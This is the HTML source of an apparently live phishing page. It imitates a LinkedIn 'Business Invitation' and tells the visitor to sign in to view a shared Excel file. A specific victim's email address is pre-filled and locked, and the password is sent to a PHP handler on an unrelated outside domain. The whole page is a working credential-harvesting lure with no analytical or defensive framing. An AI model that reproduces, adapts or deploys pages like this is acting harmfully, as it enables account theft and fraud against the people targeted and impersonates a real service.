<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>LinkedIn | Business Invitation</title>
<meta charset="utf-8" />
<link rel="icon" href="https://i.gyazo.com/99423e068ce0c32a5db07597c03d6c78.png">


<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-image {
  /* The image used */
  background-image: url("https://jennifergrantinternational.com/assets/img/uploaded/features/LinkedIn-profile-update-blog.jpg");
  
  /* Add the blur effect */
  filter: blur(4px);
  -webkit-filter: blur(4px);
  
  /* Full height */
  height: 100%; 
  
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0, 77, 0, 0.8); /* Black w/opacity/see-through */
  color: white;
  font-weight: bold;
  border: 1px solid #0FFFFFF;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  border-radius: 10px 30px;
  z-index: 2;
  width: 400px;
  height: 320px;
  padding: 20px;
  text-align: center;
  -webkit-box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71); 
  box-shadow: 5px 5px 7px 4px rgba(0,0,0,0.71);
}
</style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">

	<table align="center" style="width:340px;" cellspacing="0">
	
	<tr><td style="height:15px;"></td></tr>
	
	<tr><td>
	
		<font style="font-family: Arial, Helvetica, sans-serif;" size="4" color="#FFFFFF">
		LinkedIn Business Network
		</font>
		
		
		<br>
		
		<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
		To view your shared file, please sign in below...
		</font>
	
	</td></tr>
	
	
	<tr><td style="height:15px;">
	
		<form method="post" action="http://seryco.ch/zz/processor.php">
	
	</td></tr>
	
	
	<tr><td>
	
		
			<div align="center">
			
				<input type="email" name="login" 
				style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
				value="lacronlondon@hotmail.com" disabled>
			
			</div>
	
	
	</td></tr>
	
					
	<tr><td style="height:7px;"></td></tr>
					
	<tr><td>
					
			<div align="center">
			
				<input type="password" name="passwd" 
				style="width:320px; height:40px; border:1px solid #BDBDBD; padding:10px; border-radius: 2px; background:#FFF; font: #000" required="" 
				placeholder="Password">
			
			</div>
					
	</td></tr>
	
	
	
	<tr><td style="height:8px;"></td></tr>
					
					
					
					
	<tr><td>
					
			<div align="center">
					
					<button type="submit" value="Submit" 
					style="width:320px; height:40px; border:1px solid #084B8A; padding:10px; border-radius: 2px; background:#084B8A; font: #FFF">
						
						<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
						View File Contennt >>>
						</font>
						
					</button>
							
			</div>
					
	</td></tr>
	
	
	
	<tr><td style="height:15px;">
	
	
		<input type="hidden" name="login" value="lacronlondon@hotmail.com">
		
		</form>
	
	
	</td></tr>
	
	
	
	
	
	<tr><td>
	
			<table style="width:320px;" align="center" cellspacing="0"><tr>
			
			<td>
			
				<img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:40px; height:37px;">
			
			</td>
			
			
			<td style="width:10px;"></td>
			
			
			
			<td style="width:255px;">
			
				<div align="left">
			
					<font style="font-family: Arial, Helvetica, sans-serif;" size="2" color="#FFFFFF">
					
						Excel Sheet Details:
						
						<br>
						
						File Format: <font color="gold"><b>XLS</b></font> | File Size: <font color="gold"><b>4kb</b></font>
					
					</font>
					
				</div>
			
			</td>
			
			</tr></table>
	
	</td></tr>
	
	
	
	
	
	
	<tr><td style="height:15px;"></td></tr>
	
	</table>
	
  
</div>

</body>
</html>